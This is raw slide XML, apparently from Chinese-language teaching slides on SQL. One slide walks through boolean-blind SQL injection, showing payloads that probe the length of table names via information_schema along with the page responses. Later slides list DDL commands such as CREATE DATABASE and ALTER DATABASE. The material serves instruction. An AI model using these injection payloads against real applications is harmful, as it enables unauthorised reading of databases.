            <a:ext cx="11161240" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>接着挨个猜解表名：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' and length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1))=1 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' and length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1))=2 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示不存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>1' and length(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>=database() limit 0,1),1))=9 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>显示存在</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>说明第一个表名长度为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" kern="100" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" kern="1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231585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5100326" y="837929"/>
            <a:ext cx="2658100" cy="474140"/>
            <a:chOff x="5100326" y="837929"/>
            <a:chExt cx="2658100"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100326" y="837929"/>
              <a:ext cx="2658100" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="non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DDL</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的主要指令有</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8D19FBC-6B00-4C4D-BD50-0B08A5BB4875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2255269" y="1816125"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCF76DA1-3EEB-4734-A201-78818B4683B9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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40A0CF7D-7D32-4F8D-8140-7BD599ABF186}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2607708" y="2063504"/>
              <a:ext cx="2359236" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>CREATE DATABASE </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C61FE861-003C-4D74-9B0D-997BAFF9D857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4690994" y="1858364"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="矩形 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9638CC-9072-4475-AA69-7FD4EB14EF8B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>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1DEB042D-1B2D-41D9-A0BA-66410E9BB6C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5710279" y="2063504"/>
              <a:ext cx="1569660" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>创建新数据库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="组合 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0C0D95-22B9-4E37-BC53-359139F4DBB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5312550" y="2752229"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84ED552B-3149-4BDE-B7FE-2DEC3E95ADA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1092F1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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2" name="矩形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B6082D-53A0-4CD2-A9E3-F4921EAF6573}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2687184" y="2063504"/>
              <a:ext cx="2209772" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ALTER DATABASE </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="组合 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62307ACE-CA17-4928-9BC3-7A25659E64C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7748275" y="2794468"/>
            <a:ext cx="3036883" cy="635596"/>
            <a:chOff x="4976668" y="1930372"/>
            <a:chExt cx="3036883" cy="635596"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="矩形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C25F8BF-66BC-4D6E-B3C3-EEDA5C704B37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4976668" y="1930372"/>
              <a:ext cx="3036883" cy="635596"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="109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B2DA10F5-D272-4244-8F8E-C67908AA7479}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5825695" y="2063504"/>
              <a:ext cx="1338828" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>修改数据库</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="组合 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56743FE8-34B7-412F-8388-B12FC73FB6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2255269" y="3688333"/>
            <a:ext cx="5503157" cy="720075"/>
            <a:chOff x="2540943" y="1888133"/>
            <a:chExt cx="5503157" cy="720075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="矩形 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B16B34-83DC-48FD-9A4C-4FE0C61A8CDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2540943" y="1888133"/>
              <a:ext cx="5503157" cy="720075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">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8" name="矩形 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B09E43B-D973-4BD4-9F6C-D4A554C18839}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2854024" y="2063504"/>
              <a:ext cx="1893339" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>CREATE TABLE </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
